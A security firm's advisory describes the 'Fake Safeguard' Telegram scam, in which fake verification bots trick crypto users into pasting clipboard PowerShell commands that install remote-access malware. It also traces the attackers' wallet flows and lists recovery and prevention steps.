Recently, we have received numerous victim reports related to the “Fake Safeguard” scam on Telegram. Many users lack awareness of this type of attack, leading to insufficient vigilance when encountering it. Whether they are newcomers or seasoned players, they can easily fall victim. This article will delve into the attack methods of this scam and provide effective prevention tips to help users safeguard their assets.
Scam Analysis
This type of scam mainly comes in two forms:
- Stealing Telegram accounts: Scammers lure users into providing their phone numbers, verification codes, and even two-step verification passwords to hijack their Telegram accounts.
- Planting malware on users’ computers: This method, which has become more prevalent recently, will be the focus of this article.
Example 1
During popular token airdrops, users often experience FOMO. On Telegram, they might encounter a channel interface like the one below and are prompted to click “Tap to verify”:
Clicking “Tap to verify” opens a fake Safeguard bot, seemingly performing verification. The process appears brief and urgent, pushing users to proceed.
After clicking further, the bot falsely indicates verification failure and presents a manual verification interface:
The scammers thoughtfully provide Step 1, Step 2, and Step 3 instructions. At this point, malicious code has already been copied to the user’s clipboard. As long as the user doesn’t follow these steps, the computer remains safe. However, if the user follows the instructions, the computer will become infected.
Example 2
Scammers impersonate KOLs and use fake bots to guide users into executing malicious Powershell commands. They create fake X accounts , attach Telegram links in the comments, and invite users to join “exclusive” Telegram groups for investment opportunities. For example, a fake account in @BTW0205’s comment section might appear enticing.
Users who join the corresponding Telegram channel are guided through a fake Safeguard verification process similar to the previous example.
By clicking verification, users are prompted with Step 1, Step 2, and Step 3 instructions. Malicious code is secretly injected into their clipboard. If users paste this code into the Run dialog box, only partial content is visible, often starting with the word “Telegram,” obscuring the malicious intent.
The code, typically Powershell commands, downloads and executes more sophisticated malware, such as remote access Trojans (RATs) like Remcos. With RATs, hackers can remotely steal sensitive information, including wallet files, mnemonic phrases, private keys, and passwords, and even perform asset theft. For details about the “Fake Safeguard” malware, refer to SlowMist Zone whitehat Jose’s analysis: Link.
The comment section of the Ethereum Foundation account, @ethereumfndn, has also been affected by this scam, which operates using a large-scale net-casting strategy to exploit victims.
Most recently, Trump’s X comment section has also been contaminated by this scam.
If you access it via your mobile device, the scam will gradually gain access to your Telegram permissions. If detected in time, you should promptly navigate to Telegram’s Settings > Privacy and Security > Active Sessions and select Terminate all other sessions. Additionally, enable or modify your Two-Step Verification settings.
If you are not using a Windows computer but a Mac instead, similar methods are employed to trick you into infecting your computer. The approach is comparable: when the following screen appears in Telegram, your clipboard has already been secretly embedded with malicious code.
At this stage, no risk has materialized yet. However, if you follow the suggested steps, the following consequences will occur:
MistTrack Analysis
We selected several hacker addresses and analyzed them using the on-chain tracking and anti-money laundering platform, MistTrack.
Solana Hacker Addresses:
- HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
- 2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
- D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
These addresses collectively profited over $1.2 million, including SOL and various SPL tokens.
Hackers exchanged most SPL tokens for SOL:
Transferred SOL to multiple addresses, interacting with platforms like Binance, Huobi, and FixedFloat:
Additionally, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV still holds 1,169.73 SOL and tokens valued at over $10,000.
Next, we analyzed an Ethereum hacker address: 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6. The address conducted its first transaction in January 2025, operates across multiple blockchains, and currently holds a balance of approximately $130,000.
Funds were transferred to platforms like ChangeNOW, eXch, and Cryptomus.com.
Prevention Tips
If your computer is compromised:
- Immediately transfer funds from affected wallets. Do not assume encrypted extension wallets are safe.
- Change passwords and enable two-factor authentication (2FA) for all accounts stored in your browsers.
- Modify credentials for any other accounts on the computer, such as Telegram, if possible.
Assume the worst-case scenario: your computer is entirely transparent to the attacker. Think from the hacker’s perspective: if they had full control of a computer active in the Web3/Crypto world, what could they exploit?
Finally, back up all essential data, then reinstall the operating system. Afterward, install a reputable antivirus program such as AVG, Bitdefender, or Kaspersky, and perform a full system scan. Once these steps are completed, your computer should be secure again.
Conclusion
The “Fake Safeguard” scam has evolved into a sophisticated attack model, from impersonating comments to malware implantation and asset theft. As attack methods become increasingly refined, users must stay vigilant against misleading links and procedures. By enhancing awareness, strengthening defenses, and promptly addressing potential threats, users can effectively protect themselves from such scams.
